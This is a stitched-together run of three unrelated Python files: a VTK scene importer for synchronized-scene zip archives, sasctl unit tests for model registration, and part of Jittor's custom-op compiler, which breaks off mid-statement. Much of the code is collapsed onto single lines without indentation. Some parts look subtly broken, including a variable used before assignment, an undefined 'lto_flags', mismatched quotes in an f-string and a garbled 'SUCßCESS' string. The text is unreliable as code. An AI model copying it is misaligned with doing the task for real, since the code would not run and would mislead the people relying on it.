    vtk_arr.SetVoidArray(data, len(data)//elementSize, 1)
    vtk_arr._reference = data

def color_fun_builder(state, zf, register):
    instance = getattr(vtk, state['type'])()
    register.update({state['id']: instance})
    nodes = state['properties'].pop('nodes')
    set_properties(instance, state['properties'])
    for node in nodes:
        instance.AddRGBPoint(*node)

def piecewise_fun_builder(state, zf, register):
    instance = getattr(vtk, state['type'])()
    register.update({state['id']: instance})
    nodes = state['properties'].pop('nodes')
    set_properties(instance, state['properties'])
    for node in nodes:
        instance.AddPoint(*node)

def poly_data_builder(state, zf, register):
    instance = vtk.vtkPolyData()
    register.update({state['id']: instance})
    # geometry
    if 'points' in state['properties']:
        points = state['properties']['points']
        vtkpoints = vtk.vtkPoints()
        data_arr = ARRAY_TYPES[points['dataType']]()
        fill_array(data_arr, points, zf)
        vtkpoints.SetData(data_arr)
        instance.SetPoints(vtkpoints)
    for cell_type in ['verts', 'lines', 'polys', 'strips']:
        if cell_type in state['properties']:
            cell_arr = vtk.vtkCellArray()
            fill_array(cell_arr.GetData(), state['properties'][cell_type], zf)
            getattr(instance, 'Set' + capitalize(cell_type))(cell_arr)
    # datasets
    fields = state['properties']['fields']
    for dataset in fields:
        data_arr = ARRAY_TYPES[dataset['dataType']]()
        fill_array(data_arr, dataset, zf)
        location = getattr(instance, 'Get' + capitalize(dataset['location']))()
        getattr(location, capitalize(dataset['registration']))(data_arr)

def volume_mapper_builder(state, zf, register):
    instance = generic_builder(state, zf, register)
    instance.SetScalarMode(1)  # need to force the scalar mode to be on points

def generic_builder(state, zf, register=None):
    if register is None:
        register = {}
    instance = getattr(vtk, state['type'])()
    register.update({state['id']: instance})
    set_properties(instance, state['properties'])
    dependencies = state.get('dependencies', None)
    if dependencies:
        for dep in dependencies:
            builder = TYPE_HANDLERS[dep['type']]
            if builder:
                builder(dep, zf, register)
            else:
                print(f'No builder for {dep["type"]}')
    calls = state.get('calls', None)
    if calls:
        for call in calls:
            args = []
            skip = False
            for arg in call[1]:
                try:
                    extract_instance = WRAP_ID_RE.findall(arg)[0]
                    args.append(register[extract_instance])
                except (IndexError, TypeError):
                    args.append(arg)
                except KeyError:
                    skip = True
            if skip:
                continue
if capitalize(call[0]) not in METHODS_RENAME: method = capitalize(call[0]) else: method = METHODS_RENAME[capitalize(call[0])] if method is None: continue getattr(instance, method)(*args) arrays = state.get('arrays', None) if arrays: for array_meta in arrays: vtk_array = ARRAY_TYPES[array_meta['dataType']]() fill_array(vtk_array, array_meta, zf) location = (instance if 'location' not in array_meta else getattr(instance, 'Get'+capitalize(array_meta['location']))()) getattr(location, capitalize(array_meta['registration']))(vtk_array) return instance def set_properties(instance, properties): for k, v in properties.items(): fn = getattr(instance, 'Set'+capitalize(k), None) if fn: fn(v) def import_synch_file(filename): with zipfile.ZipFile(filename, 'r') as zf: scene = json.loads(zf.read('index.json').decode()) scene['properties']['numberOfLayers'] = 1 renwin = generic_builder(scene, zf) return renwin def make_type_handlers(): aliases = { 'vtkMapper': ['vtkOpenGLPolyDataMapper', 'vtkCompositePolyDataMapper2', 'vtkDataSetMapper'], 'vtkProperty': ['vtkOpenGLProperty'], 'vtkRenderer': ['vtkOpenGLRenderer'], 'vtkCamera': ['vtkOpenGLCamera'], 'vtkColorTransferFunction': ['vtkPVDiscretizableColorTransferFunction'], 'vtkActor': ['vtkOpenGLActor', 'vtkPVLODActor'], 'vtkLight': ['vtkOpenGLLight', 'vtkPVLight'], 'vtkTexture': ['vtkOpenGLTexture'], 'vtkVolumeMapper': ['vtkFixedPointVolumeRayCastMapper', 'vtkSmartVolumeMapper'] } type_handlers = { 'vtkRenderer': generic_builder, 'vtkLookupTable': generic_builder, 'vtkLight': None, 'vtkCamera': generic_builder, 'vtkPolyData': poly_data_builder, 'vtkImageData': generic_builder, 'vtkMapper': generic_builder, 'vtkGlyph3DMapper': generic_builder, 'vtkProperty': generic_builder, 'vtkActor': generic_builder, 'vtkFollower': generic_builder, 'vtkColorTransferFunction': color_fun_builder, 'vtkPiecewiseFunction': piecewise_fun_builder, 'vtkTexture': generic_builder, 'vtkVolumeMapper': volume_mapper_builder, 'vtkVolume': generic_builder, 'vtkVolumeProperty': generic_builder } for k, alias_list in aliases.items(): for alias in alias_list: type_handlers.update({ alias: type_handlers[k] }) return type_handlers TYPE_HANDLERS = make_type_handlers()
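# --- Usage sketch (added illustration, not part of the original module) ---
# Rebuilds a scene from a synchronized-scene archive and displays it.
# 'scene.synch.zip' is a hypothetical path; import_synch_file returns the
# reconstructed top-level object, typically a vtkRenderWindow in these
# exports.
if __name__ == '__main__':
    render_window = import_synch_file('scene.synch.zip')
    interactor = vtk.vtkRenderWindowInteractor()
    interactor.SetRenderWindow(render_window)
    render_window.Render()
    interactor.Start()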
#!/usr/bin/env python # encoding: utf-8 # # Copyright © 2019, SAS Institute Inc., Cary, NC, USA. All Rights Reserved. # SPDX-License-Identifier: Apache-2.0 import pytest from six.moves import mock from sasctl.core import RestObj from sasctl._services.model_repository import ModelRepository def test_sklearn_metadata(): pytest.importorskip('sklearn') from sasctl.tasks import _sklearn_to_dict from sklearn.linear_model import LogisticRegression, LinearRegression from sklearn.ensemble import GradientBoostingClassifier from sklearn.tree import DecisionTreeClassifier from sklearn.ensemble import RandomForestClassifier from sklearn.svm import SVC info = _sklearn_to_dict(LinearRegression()) assert info['algorithm'] == 'Linear regression' assert info['function'] == 'prediction' info = _sklearn_to_dict(LogisticRegression()) assert info['algorithm'] == 'Logistic regression' assert info['function'] == 'classification' info = _sklearn_to_dict(SVC()) assert info['algorithm'] == 'Support vector machine' assert info['function'] == 'classification' info = _sklearn_to_dict(GradientBoostingClassifier()) assert info['algorithm'] == 'Gradient boosting' assert info['function'] == 'classification' info = _sklearn_to_dict(DecisionTreeClassifier()) assert info['algorithm'] == 'Decision tree' assert info['function'] == 'classification' info = _sklearn_to_dict(RandomForestClassifier()) assert info['algorithm'] == 'Forest' assert info['function'] == 'classification' def test_parse_module_url(): from sasctl.tasks import _parse_module_url body = RestObj({'createdBy': 'sasdemo', 'creationTimeStamp': '2019-08-26T15:16:42.900Z', 'destinationName': 'maslocal', 'id': '62cae262-7287-412b-8f1d-bd2a12c8b434', 'links': [{'href': '/modelPublish/models/44d526bc-d513-4637-b8a7-72daee4a7730', 'method': 'GET', 'rel': 'up', 'type': 'application/vnd.sas.models.publishing.publish', 'uri': '/modelPublish/models/44d526bc-d513-4637-b8a7-72daee4a7730'}, {'href': '/modelPublish/models/44d526bc-d513-4637-b8a7-72daee4a7730/log', 'method': 'GET', 'rel': 'self', 'type': 'application/json', 'uri': '/modelPublish/models/44d526bc-d513-4637-b8a7-72daee4a7730/log'}], 'log': 
'SUCCESS==={"links":[{"method":"GET","rel":"up","href":"/microanalyticScore/jobs","uri":"/microanalyticScore/jobs","type":"application/vnd.sas.collection","itemType":"application/vnd.sas.microanalytic.job"},{"method":"GET","rel":"self","href":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3","uri":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3","type":"application/vnd.sas.microanalytic.job"},{"method":"GET","rel":"source","href":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3/source","uri":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3/source","type":"application/vnd.sas.microanalytic.module.source"},{"method":"GET","rel":"submodules","href":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3/submodules","uri":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3/submodules","type":"application/vnd.sas.collection","itemType":"application/vnd.sas.microanalytic.submodule"},{"method":"DELETE","rel":"delete","href":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3","uri":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3"},{"method":"GET","rel":"module","href":"/microanalyticScore/modules/decisiontree","uri":"/microanalyticScore/modules/decisiontree","type":"application/vnd.sas.microanalytic.module"}],"version":1,"createdBy":"sasdemo","creationTimeStamp":"2019-08-26T15:16:42.857Z","modifiedBy":"sasdemo","modifiedTimeStamp":"2019-08-26T15:16:48.988Z","id":"465ecad8-cfd0-4403-ac8a-e49cd248fae3","moduleId":"decisiontree","state":"completed","errors":[]}', 'modelId': '459aae0d-d64f-4376-94e7-be31911f4bdb', 'modelName': 'DecisionTree', 'modifiedBy': 'sasdemo', 'modifiedTimeStamp': '2019-08-26T15:16:49.315Z', 'publishName': 'Decision Tree', 'version': 1}) msg = body.get('log').lstrip('SUCßCESS===') assert _parse_module_url(msg) == '/microanalyticScore/modules/decisiontree' def test_save_performance_project_types(): from sasctl.tasks import update_model_performance with mock.patch('sasctl._services.model_repository.ModelRepository.get_model') as model: with mock.patch('sasctl._services.model_repository.ModelRepository.get_project') as project: model.return_value = RestObj(name='fakemodel', projectId=1) # Function is required with pytest.raises(ValueError): project.return_value = {} update_model_performance(None, None, None) # Target Level is required with pytest.raises(ValueError): project.return_value = {'function': 'Prediction'} update_model_performance(None, None, None) # Prediction variable required with pytest.raises(ValueError): project.return_value = {'function': 'Prediction', 'targetLevel': 'Binary'} update_model_performance(None, None, None) # Classification variable required with pytest.raises(ValueError): project.return_value = {'function': 'classification', 'targetLevel': 'Binary'} update_model_performance(None, None, None) # Check projects w/ invalid properties @mock.patch.object(ModelRepository, 'list_repositories') @mock.patch.object(ModelRepository, 'get_project') def test_register_model_403_error(get_project, list_repositories): """Verify HTTP 403 is converted to a user-friendly error. Depending on environment configuration, this can happen when attempting to find a repository. 
See: https://github.com/sassoftware/python-sasctl/issues/39 """ from six.moves.urllib.error import HTTPError from sasctl.exceptions import AuthorizationError from sasctl.tasks import register_model get_project.return_value = {'name': 'Project Name'} list_repositories.side_effect = HTTPError(None, 403, None, None, None) # HTTP 403 error when getting repository should throw a user-friendly # AuthorizationError with pytest.raises(AuthorizationError): register_model(None, 'model name', 'project name') # All other errors should be bubbled up list_repositories.side_effect = HTTPError(None, 404, None, None, None) with pytest.raises(HTTPError): register_model(None, 'model name', 'project name')
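# --- Note (added; not part of the original test module) ---
# These tests need no live SAS Viya deployment: every service call above is
# intercepted with mock.patch / mock.patch.object. A typical invocation,
# assuming this file lives at tests/test_tasks.py (hypothetical path) and the
# optional sklearn dependency is installed:
#
#   pytest tests/test_tasks.py -v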
# *************************************************************** # Copyright (c) 2021 Jittor. All Rights Reserved. # Maintainers: Dun Liang <randonlang@gmail.com>. # This file is subject to the terms and conditions defined in # file 'LICENSE.txt', which is part of this source code package. # *************************************************************** import subprocess as sp import os import re import sys import glob import inspect import datetime import threading import platform import ctypes import platform from ctypes import cdll from ctypes.util import find_library import jittor_utils as jit_utils from jittor_utils import LOG, run_cmd, cache_path, find_exe, cc_path, cc_type, cache_path from . import pyjt_compiler from jittor_utils import lock from jittor_utils import install_cuda from jittor import __version__ import hashlib def find_jittor_path(): return os.path.dirname(__file__) def make_cache_dir(cache_path): if not os.path.isdir(cache_path): LOG.i(f"Create cache dir: {cache_path}") os.mkdir(cache_path) def shsplit(s): s1 = s.split(' ') s2 = [] count = 0 for s in s1: nc = s.count('"') + s.count('\'') if count&1: count += nc s2[-1] += " " s2[-1] += s else: count = nc s2.append(s) return s2 def remove_flags(flags, rm_flags): flags = shsplit(flags) output = [] for s in flags: ss = s.replace("\"", "") for rm in rm_flags: if ss.startswith(rm) or ss.endswith(rm): break else: output.append(s) return " ".join(output) def moveback_flags(flags, rm_flags): flags = shsplit(flags) output = [] output2 = [] for s in flags: ss = s.replace("\"", "") for rm in rm_flags: if ss.startswith(rm) or ss.endswith(rm): output2.append(s) break else: output.append(s) return " ".join(output+output2) def map_flags(flags, func): flags = shsplit(flags) output = [] for s in flags: output.append(func(s)) return " ".join(output) def compile(compiler, flags, inputs, output, combind_build=False, cuda_flags=""): def do_compile(cmd): if jit_utils.cc: return jit_utils.cc.cache_compile(cmd, cache_path, jittor_path) else: run_cmd(cmd) return True base_output = os.path.basename(output).split('.')[0] if os.name == 'nt': # windows do not combind build, need gen def combind_build = False # windows need xxxx.lib afile = output.rsplit('.', 1)[0] + ".lib" afile = os.path.join(cache_path, afile) if cc_type != 'cl': # initialize order in windows seems reversed inputs = list(inputs[::-1]) link = link + f' -Wl,--export-all-symbols,--out-implib,"{afile}" ' if not os.path.isabs(output): output = os.path.join(cache_path, output) # don't recompile object file in inputs obj_files = [] ex_obj_files = [] new_inputs = [] for name in inputs: if name[-1] in 'oab': ex_obj_files.append(name) else: new_inputs.append(os.path.join(jittor_path, name)) obj_files.append(os.path.join( cache_path, "obj_files", os.path.basename(name)+".o")) inputs = new_inputs cm = lambda s: f"\"{s}\"" cms = lambda arr: [f"\"{s}\"" for s in arr ] if len(inputs) == 1 or combind_build: cmd = f"\"{compiler}\" {" ".join(cms(inputs))} {flags} -o {cm(output)}" return do_compile(fix_cl_flags(cmd)) # split compile object file and link # remove -l -L flags when compile object files oflags = remove_flags(flags, ['-l', '-L', '-Wl,', '.lib', '-shared']) cmds = [] for input, obj_file in zip(inputs, obj_files): cc = compiler nflags = oflags cmd = f"{cm(input)} {nflags} {lto_flags} -c -o {cm(obj_file)}" if input.endswith(".cu"): if has_cuda: cmd = f"\"{nvcc_path}\" {cuda_flags} {cmd}" cmd = convert_nvcc_flags(fix_cl_flags(cmd)) else: continue else: cmd = f"\"{cc}\" {cmd}" cmd = 
fix_cl_flags(cmd) if "nan_checker" in input: # nan checker needs to disable fast_math cmd = cmd.replace("--use_fast_math", "") cmd = cmd.replace("-Ofast", "-O2") cmds.append(cmd) jit_utils.run_cmds(cmds, cache_path, jittor_path, "Compiling "+base_output) obj_files += ex_obj_files if os.name == 'nt': dumpdef_path = os.path.join(jittor_path, "utils", "dumpdef.py") cmd = f"\"{sys.executable}\" \"{dumpdef_path}\" {" ".join(cms(obj_files))} -Fo: \"{output}.def\"" do_compile(fix_cl_flags(cmd)) cmd = f"\"{compiler}\" {" ".join(cms(obj_files))} -o {cm(output)} {flags} {lto_flags}" return do_compile(fix_cl_flags(cmd)) def gen_jit_tests(): all_src = glob.glob(jittor_path+"/src/**/*.cc", recursive=True) jit_declares = [] re_def = re.compile("JIT_TEST\\((.*?)\\)") names = set() test_defs = [] for src_name in all_src: with open(src_name, 'rb') as f: src = f.read().decode('utf8') defs = re_def.findall(src) for name in defs: LOG.vv(f"Find test {name} from {src_name}") assert name not in names, f"Conflict test name {name}" names.add(name) jit_declares.append(f"JIT_TEST({name});") test_defs.append(f""" /* From {src_name} */ // @pyjt({name}) static inline void test_{name}() {{ jit_test_{name}(); }} """) jit_declares = "\n ".join(jit_declares) jit_src = f""" #pragma once #include "common.h" void expect_error(std::function<void()> func) {{ try {{ func(); }} catch (...) {{ return; }} CHECK(0) << "Missing error"; }} namespace jittor {{ {jit_declares} // @pyjt(tests) // @attrs(submodule) namespace tests {{ {"".join(test_defs)} }} }} // jittor """ LOG.vvvv(jit_src) with open(os.path.join(cache_path, "gen", "jit_tests.h"), 'w') as f: f.write(jit_src) def gen_jit_flags(): all_src = glob.glob(jittor_path+"/src/**/*.cc", recursive=True) jit_declares = [] re_def = re.compile("DEFINE_FLAG(_WITH_SETTER)?\\((.*?)\\);", re.DOTALL) flags_defs = [] visit = {} for src_name in all_src: with open(src_name, 'rb') as f: src = f.read().decode("utf8") defs = re_def.findall(src) for _, args in defs: args = args.split(",") type = args[0].strip() name = args[1].strip() if not has_cuda and "cuda" in name and name!="use_cuda": continue default = args[2].strip() doc = ",".join(args[3:]) doc = eval(f"({doc})") LOG.vv(f"Find define {name} from {src_name}") if name in visit: continue visit[name] = 1 jit_declares.append(f"DECLARE_FLAG({type}, {name});") flags_defs.append(f""" /* {name}(type:{type}, default:{default}): {doc} */ // @pyjt(__get__{name}) {type} _get_{name}() {{ return {name}; }} // @pyjt(__set__{name}) void _set_{name}({type} v) {{ set_{name}(v); }} {f'''// @pyjt(__set__{name}) void _set_{name}(bool v) {{ set_{name}(v); }} ''' if type=="int" else ""} """) jit_declares = "\n ".join(jit_declares) jit_src = f""" #include "utils/flags.h" namespace jittor {{ {jit_declares} // @pyjt(Flags) struct _Flags {{ // @pyjt(__init__) _Flags() {{}} {"".join(flags_defs)} }}; }} // jittor """ LOG.vvvv(jit_src) with open(os.path.join(cache_path, "gen", "jit_flags.h"), 'w') as f: f.write(jit_src) def gen_jit_op_maker(op_headers, export=False, extra_flags=""): def add_src( cc_func_name, cc_args, op_name, op_args, src, pybind_name, py_args, jit_cc_src, doc_string, attrs ): has_ir = set(["add", "sub", "mul", "matmul", "truediv", "floordiv", "mod", "divmod", "pow", "lshift", "rshift", "and", "xor", "or"]) pybind_names = [ s.strip() for s in pybind_name.split(",")] cc_make_args = [ arg.replace("VarHolder*", "Var*") for arg in cc_args ] op_make_args = [ arg.replace("->var", "") for arg in op_args ] py_args = [ arg.replace("Var*", "VarHolder*") for arg 
in py_args ] op_args = [] cc_args_with_default = [] for i, arg in enumerate(cc_args): pre_arg = arg.split()[-1].split('=')[0] op_arg = None if arg.startswith("VarHolder*"): op_arg = pre_arg+"->var" elif arg.startswith("vector<VarHolder*>"): op_arg = f"convert({pre_arg})" if "&&" in arg: if op_arg == None: op_arg = "move("+pre_arg+")" op_make_args[i] = "move("+pre_arg+")" if op_arg==None: op_arg = pre_arg op_args.append(op_arg) py_arg = py_args[i] if "_a=" not in py_arg: cc_args_with_default.append(arg) continue py_arg = py_arg.split("_a=")[1] cc_args_with_default.append(arg + "=" + py_arg) cc_args = cc_args_with_default # steps of Op creation: # 1. new op # 2. new output var (create_output in op constructor) # 3. take over op's output VarPtr from outputs_holder # 4. set op's output # 5. set op's input # 6. infer shape(op->init()) if "multiple_outputs" not in attrs: jit_cc_src.append(f""" VarPtr make_{cc_func_name}({", ".join(cc_make_args)}) {{ auto _op = new {op_name}({", ".join(op_make_args)}); if (_op->outputs_holder.size() != 1) {{ delete _op; LOGf << "Wrong output size of" << \"{op_name}\"; }} if (_op->flags.get(NodeFlags::_forwarded)) {{ VarPtr _out(move(_op->outputs_holder[0])); delete _op; return _out; }} _op->outputs_holder[0]->set_inputs({{_op}}); VarPtr _out(move(_op->outputs_holder[0])); {src.replace("->var","")}; _op->init(); return _out; }} """) else: jit_cc_src.append(f""" vector<VarPtr> make_{cc_func_name}({", ".join(cc_make_args)}) {{ auto _op = new {op_name}({", ".join(op_make_args)}); if (_op->flags.get(NodeFlags::_forwarded)) {{ vector<VarPtr> _outs = move(_op->outputs_holder); delete _op; return _outs; }} vector<VarPtr> _outs = move(_op->outputs_holder); for (uint i=0; i<_outs.size(); i++) _outs[i]->set_inputs({{_op}}); {src.replace("->var","")}; _op->init(); return _outs; }} """) if pybind_name == 'None': return pyjt_names = [] for pybind_name in pybind_names: if pybind_name.startswith("__"): pyjt_names.append("Var."+pybind_name) else: pyjt_names.append(pybind_name) if len(cc_args)>0 and cc_args[0].startswith("VarHolder* "): pyjt_names.append("Var."+pybind_name) if "multiple_outputs" in attrs: jit_cc_src.append(f""" /*{doc_string}*/ // @pyjt({",".join(pyjt_names)}) vector<VarHolder*> {cc_func_name}({", ".join(cc_args)}) {{ { f'return make_vh_vector(make_{cc_func_name}({', '.join(op_args)}));' if "replace_outputs" not in attrs else f'''auto rt = make_vh_vector(make_{cc_func_name}({", ".join(op_args)})); ASSERT(rt.size() == outputs.size()); for (int i=0; i<outputs.size(); i++) outputs[i]->assign(rt[i]); return rt; '''} }} """) else: jit_cc_src.append(f""" /*{doc_string}*/ // @pyjt({",".join(pyjt_names)}) VarHolder* {cc_func_name}({", ".join(cc_args)}) {{ return new VarHolder(make_{cc_func_name}({", ".join(op_args)})); }} """) need_ir_define = False ir_name = None for pybind_name in pybind_names: if pybind_name.startswith("__") and pybind_name[2:-2] in has_ir: need_ir_define = True assert ir_name is None ir_name = pybind_name[2:-2] if need_ir_define: assert len(cc_args)>0 and cc_args[0].startswith("VarHolder* ") this = cc_args[0].split()[-1] jit_cc_src.append(f""" // @pyjt(Var.__i{ir_name}__) // @attrs(return_self) VarHolder* i{cc_func_name}({", ".join(cc_args)}) {{ *{this} = make_{cc_func_name}({", ".join(op_args)}); return {this}; }} """) assert len(cc_args)>1 and cc_args[1].startswith("VarHolder* "), cc_args r_cc_args = [cc_args[1], cc_args[0]] + cc_args[2:] r_py_args = [py_args[1], py_args[0]] + py_args[2:] jit_cc_src.append(f""" VarHolder* r{cc_func_name}({", 
".join(r_cc_args)}) {{ return new VarHolder(make_{cc_func_name}({", ".join(op_args)})); }} """) jit_cc_src = [] jit_headers = "" initer = [] pybind_reg = '(/\\*(.*?)\\*/\\s*)?(//\\s*@pybind\\(([^\\n]*)\\)\\s*)?' pybind_attrs_reg = pybind_reg + '(//\\s*@attrs\\(([^\\n]*)\\)\\s*)?' for header in op_headers: # xxx_xxx_op name = os.path.basename(header) name = os.path.splitext(name)[0] # xxx_xxx assert name.endswith("_op") func_name = name[:-3] # XxxXxxOp name2 = map(lambda s:s[:1].upper() + s[1:], name.split('_')) name2 = "".join(name2) with open(header, encoding='utf8') as f: src = f.read() # XxxXxxOp(args) res = re.findall(pybind_attrs_reg + '[^~]('+name2+"\\([^\\n]*\\))", src, re.S) assert len(res) >= 1, "Wrong op args in " + header # registe op cc_name = header[:-2] + ".cc" constructors = [] for i in range(len(res)): name = 'make_'+func_name+'_'*i constructors.append(f"{{ &typeid(&{name}), (void*)&{name} }}") constructors = ",".join(constructors) var_member_reg = r"\n\s*Var\b(.*);" var_member_match = re.findall(var_member_reg, src) var_member_match = " ".join(var_member_match) for c in "*,": var_member_match = var_member_match.replace(c, " ") var_member = var_member_match.split() LOG.vv("var_member_match "+var_member_match) LOG.vv("var_member "+str(var_member)) var_member_src = [ f"VAR_MEMBER_NAME_AND_OFFSET({name}, {name2})" for name in var_member ] var_member_src = ",".join(var_member_src) initer.append(f'\n op_registe({{ '{func_name}', R'({cc_name})", extra_flags, {{{constructors}}}, {{{var_member_src}}} }});') for hid, h_def in enumerate(res): h_def = list(h_def) # // @attrs(...) attrs = {} if h_def[4] != "": attrs = pyjt_compiler.parse_attrs(h_def[5]) del h_def[4:6] # /* doc_string */ # // @pybind(bind_name) # XxxXxxOp(args_def) doc_string = h_def[1].strip() h_def = h_def[2:] args_def = h_def[2][len(name2)+1:-1] bind_name = h_def[1] if bind_name == "": bind_name = func_name if args_def=="": args = [] else: args = list(map(lambda s: s.split()[-1].split('=')[0], args_def.split(','))) # py_args: "arg"_a=default py_args = [] new_args_def = [] new_args = [] # source of convert VarHolder* to Var* vh2v_src = [] more_src = [] for arg, arg_def in zip(args, args_def.split(',')): py_arg = f'"{arg}"_a' if '=' in arg_def: py_arg += "=" + arg_def.split('=')[-1] arg_def = arg_def.split('=')[0] py_args.append(py_arg) arg_type = arg_def[:-(len(arg)+1)].strip() if arg_type == "Var*": new_args_def.append("VarHolder* " + arg) vh2v_src.append(arg + "->var") new_args.append(arg + "->var") elif arg_type.startswith("vector<Var*>"): new_args_def.append( arg_type.replace("Var", "VarHolder")+' '+arg) new_args.append(arg) more_src.append(f"_op->add_inputs({arg});") elif arg_type.startswith("VarSlices"): new_args_def.append(arg_def) new_args.append(arg) more_src.append(f""" vector<Var*> svars; for (int i=0; i<_op->vs.n; i++) if (_op->vs.slices[i].is_var()) svars.push_back(_op->vs.slices[i].var); _op->add_inputs(svars);""") else: new_args_def.append(arg_def) new_args.append(arg) vh2v_src = "_op->set_inputs({" + ", ".join(vh2v_src) + "});" + \ "".join(more_src) LOG.vvvv(f"Find op: {name2} args: {new_args}") # if header.startswith("src/"): # jit_headers += f"#include \"{header[4:]}\"\n" # else: jit_headers += f"#include \"{header}\"\n" add_src( func_name+'_'*hid, new_args_def, name2, new_args, vh2v_src, bind_name, py_args, jit_cc_src, doc_string, attrs ) if func_name in ["binary", "unary", "reduce"]: # generate binary op alias with open(os.path.join(jittor_path, f"src/ops/{func_name}_op.cc"), encoding="utf-8") as 
f: src = f.read() src = src.split(f"unordered_set<string> {func_name}_ops = ""{")[1].split("};")[0] match_result = re.findall(pybind_reg + "\"([a-z_A-Z0-9]*)\"", src, re.S) # remove /* doc_string */ pattern res2 = [ (_[3], _[4]) for _ in match_result ] LOG.vvvv(f"All supported {func_name} ops: {res2}") # remove op args if func_name == "reduce": args_def = new_args_def[:1] + new_args_def[2:] py_args_s = py_args[:1] + py_args[2:] else: args_def = new_args_def[:-1] py_args_s = py_args[:-1] # find the last type id(float64) # add "_" suffix for all function if func_name == "unary": last_tid = res2.index(("","float64")) # for each functor for tid, (bind_name, func_name2) in enumerate(res2): # get certain op doc_string doc_string2 = match_result[tid][1].strip() if len(doc_string2) == 0: doc_string2 = doc_string # add _ for types if func_name == "unary" and tid <= last_tid: func_name3 = func_name2 + "_" elif func_name == "reduce": func_name4 = func_name2 func_name2 = "reduce_" + func_name2 func_name3 = func_name2 else: func_name3 = func_name2 if len(bind_name) == 0: bind_name = func_name2 if func_name == "reduce": args = new_args[:1] + [f'ns_{func_name4}'] + new_args[2:] else: args = new_args[:-1] + [f'ns_{func_name2}'] add_src( func_name3+'_'*hid, args_def, name2, args, vh2v_src, bind_name, py_args_s, jit_cc_src, doc_string2, attrs ) jit_src = f""" #pragma once #include "pyjt/py_obj_holder.h" #include "var.h" #include "var_holder.h" #include "ops/op_register.h" {jit_headers} namespace jittor {{ // fix make_array(py::array) undefine reference #pragma GCC visibility push(default) #define JIT_NAMESPACE {export+"_maker" if export else "jit_op_maker"} // @pyjt(ops) // @attrs(submodule{",core_name="+export if export else ""}) namespace JIT_NAMESPACE {{ {"".join(jit_cc_src)} void initer() {{ string extra_flags = R"({extra_flags})"; {"".join(initer)} }} int caller = (initer(), 0); }} // JIT_NAMESPACE }} // jittor {f''' namespace jittor {{ extern void pyjt_def_{export}(PyObject*); }} static void init_module(PyModuleDef* mdef, PyObject* m) {{ mdef->m_doc = "User defined custom ops"; jittor::pyjt_def_{export}(m); }} PYJT_MODULE_INIT({export}); ''' if export else ""} """ return jit_src @lock.lock_scope() def compile_custom_op(header, source, op_name, warp=True): """Compile a single custom op header: code of op header, not path source: code of op source, not path op_name: op_name of this op, it will used for generation of header and source files, if the type name of op is XxxXxxOp, op_name should be xxx_xxx warp: if true, warp a snippet for header and source """ if warp: header = f""" #pragma once #include "op.h" #include "var.h" namespace jittor {{ {header} }} """ source = f""" #include "{op_name}_op.h" namespace jittor {{ {source} }} """ cops_dir = os.path.join(cache_path, "custom_ops") make_cache_dir(cops_dir) hname = os.path.join(cops_dir, op_name+"_op.h") ccname = os.path.join(cops_dir, op_name+"_op.cc") with open(hname, 'w') as f: f.write(header) with open(ccname, 'w') as f: f.write(source) m = compile_custom_ops([hname, ccname]) return getattr(m, op_name) @lock.lock_scope() def compile_custom_ops( filenames, extra_flags="", return_module=False, dlopen_flags=None, gen_name_ = ""): """Compile custom ops filenames: path of op source files, filenames must be pairs of xxx_xxx_op.cc and xxx_xxx_op.h, and the type name of op must be XxxXxxOp. 
extra_flags: extra compile flags return_module: return module rather than ops(default: False) return: compiled ops """ if dlopen_flags is None: dlopen_flags = os.RTLD_GLOBAL | os.RTLD_NOW if platform.system() == 'Linux': dlopen_flags |= os.RTLD_DEEPBIND srcs = {} headers = {} builds = [] includes = [] pyjt_includes = [] for name in filenames: name = os.path.realpath(name) if name.endswith(".cc") or name.endswith(".cpp") or name.endswith(".cu"): builds.append(name) if name.endswith(".h"): dirname = os.path.dirname(name) if dirname.endswith("inc"): includes.append(dirname) with open(name, "r") as f: if "@pyjt" in f.read(): pyjt_includes.append(name) bname = os.path.basename(name) bname = os.path.splitext(bname)[0] if bname.endswith("_op"): bname = bname[:-3] if name.endswith(".cc"): srcs[bname] = name elif name.endswith(".h"): includes.append(os.path.dirname(name)) headers[bname] = name assert len(srcs) == len(headers), "Source and header names not match" for name in srcs: assert name in headers, f"Header of op {name} not found" gen_name = "gen_ops_" + "_".join(headers.keys()) if gen_name_ != "": gen_name = gen_name_ if len(gen_name) > 50: gen_name = gen_name[:50] + "___hash" + hashlib.md5(gen_name.encode()).hexdigest()[:6] includes = sorted(list(set(includes))) includes = "".join(map(lambda x: f" -I\"{x}\" ", includes)) LOG.vvvv(f"Include flags:{includes}") op_extra_flags = includes + extra_flags lib_path = os.path.join(cache_path, "custom_ops") make_cache_dir(lib_path) gen_src_fname = os.path.join(lib_path, gen_name+".cc") gen_head_fname = os.path.join(lib_path, gen_name+".h") gen_lib = os.path.join(lib_path, gen_name+extension_suffix) libname = gen_name + lib_suffix op_extra_flags += f" -L\"{lib_path}\" -l\"{libname}\" " gen_src = gen_jit_op_maker(headers.values(), export=gen_name, extra_flags=op_extra_flags) pyjt_compiler.compile_single(gen_head_fname, gen_src_fname, src=gen_src) # gen src initialize first builds.insert(0, gen_src_fname) def insert_anchor(gen_src, anchor_str, insert_str): # insert insert_str after anchor_str into gen_src return gen_src.replace(anchor_str, anchor_str+insert_str, 1) for name in pyjt_includes: LOG.v("handle pyjt_include ", name) bname = os.path.basename(name).split(".")[0] gen_src_fname = os.path.join(cache_path, "custom_ops", gen_name+"_"+bname+".cc") pyjt_compiler.compile_single(name, gen_src_fname) builds.insert(1, gen_src_fname) gen_src = insert_anchor(gen_src, "namespace jittor {", f"extern void pyjt_def_{bname}(PyObject* m);") gen_src = insert_anchor(gen_src, "init_module(PyModuleDef* mdef, PyObject* m) {", f"jittor::pyjt_def_{bname}(m);") with open(gen_head_fname, "w") as f: f.write(gen_src) LOG.vvv(f"Build custum ops lib:{gen_lib}") LOG.vvvv(f"Build sources:{builds}") compile(cc_path, extra_flags+cc_flags+opt_flags+includes, builds, gen_lib) # add python path and import LOG.vvv(f"Import custum ops lib:{gen_lib}") lib_path = 